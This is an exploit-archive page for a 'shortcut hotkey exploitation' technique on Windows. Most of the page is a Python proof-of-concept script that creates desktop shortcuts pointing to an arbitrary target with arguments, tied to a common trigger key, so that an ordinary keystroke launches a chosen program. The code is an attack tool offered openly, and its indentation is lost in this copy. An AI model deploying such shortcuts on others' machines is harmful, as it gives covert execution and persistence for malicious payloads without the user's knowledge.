Shortcut hotkey exploitation paper (hebrew) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-04-29 | Type : papers | Platform : windows
This exploit / vulnerability Shortcut hotkey exploitation paper (hebrew) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Written by Ido Veltzman
#
# Imports
from __future__ import print_function
from sys import version_info
from os import makedirs
from os.path import join, isfile, isdir
import winshell

# Fixing the program so it will work for both python 2 and python 3.
if version_info.major == 2:
input = raw_input

# Constants
SPECIALS = {"N0": 96, "N1": 97, "N2": 98, "N3": 99, "N4": 100, "N5": 101, "N6": 102, "N7": 103, "N8": 104, "N9": 105,
"Ndel": 110, "Pup": 2081, "Pdown": 2082, "Home": 2084, "End": 2083, "Insert": 2093, "Numlock": 2192,
"Capslock": 20, "Space": 32, "Shift": 256, "Ctrl": 512, "Alt": 1024, "Delete": 127, "Up": 2086,
"Down": 2088, "Left": 2085, "Right": 2087}
HOTKEY = 90
DESCRIPTION = """
Shortcut Hotkey Exploitation POC
Press enter to apply default option whenever a default option is supplied.

Possible hotkey special characters:
N0-9: Numpad 0-9.
Ndel: Numpad del.
Pup / Pdown: Page Up / Page Down.
Home, End, Insert, Numlock, Down, Left, Right, Shift, Space, Capslock.\n
"""


def create_shortcut(shortcut_name, target, arguments=None, shortcut_path=None, description=None, hotkey=HOTKEY):
"""
Creating shortcut with given parameters.
:param shortcut_name: Shortcut's name.
:param target: Shortcut's target file.
:param arguments: Arguments for the target file.
:param shortcut_path: Where the shortcut will be created. Default is on the desktop.
:param description: Shortcut description. Default is nothing.
:param hotkey: Assign a key to the shortcut file. Default is the constant HOTKEY (defined above).
"""
# Checking if the path exists and if not creating it. If there's no path choosing default.
if shortcut_path:

# Validation check.
if isdir(shortcut_path):
shortcut = winshell.shortcut(join(shortcut_path, shortcut_name))
else:
print("[!] It appears that the directory {} not exists!".format(shortcut_path))
print("[+] Creating {}".format(shortcut_path))
makedirs(shortcut_path)
shortcut = winshell.shortcut(join(shortcut_path, shortcut_name))
else:
shortcut = winshell.shortcut(join(winshell.desktop(), shortcut_name))

# Validation check and setting up target file.
if isfile(target):
shortcut.path = target
else:
print("[!] The file {} doesn't exists. Please run again this program with valid file.".format(target))
return

# Appending description if exists.
if description:
shortcut.description = description

# Adding arguments if exists.
if arguments:
shortcut.arguments = arguments

# Assigning hotkey.
shortcut.hotkey = ord(hotkey.upper())

# Creating the shortcut.
shortcut.write()


def main():
print(DESCRIPTION)
shortcut_name = input("[*] Enter shortcut name\n> ")
shortcut_target = input("\n[*] Enter target file path\n> ")
shortcut_args = input("\n[*] Enter target file arguments (Default is nothing)\n> ")
shortcut_path = input("\n[*] Enter shortcut path (Default is your desktop)\n> ")
shortcut_desc = input("\n[*] Enter shortcut description (Default is nothing)\n> ")
shortcut_hotkey = input("\n[*] Enter shortcut trigger key (Default in this program is: {})\n> ".format(chr(HOTKEY)))

# Checking if the user entered a special hotkey or regular.
if len(shortcut_hotkey) > 1:
shortcut_hotkey = chr(SPECIALS[shortcut_hotkey])
elif not shortcut_hotkey:
shortcut_hotkey = chr(HOTKEY)

# Creating shortcut.
create_shortcut(shortcut_name, shortcut_target, shortcut_args, shortcut_path, shortcut_desc, shortcut_hotkey)
print("[+] Shortcut successfuly created.")


if __name__ == "__main__":
main()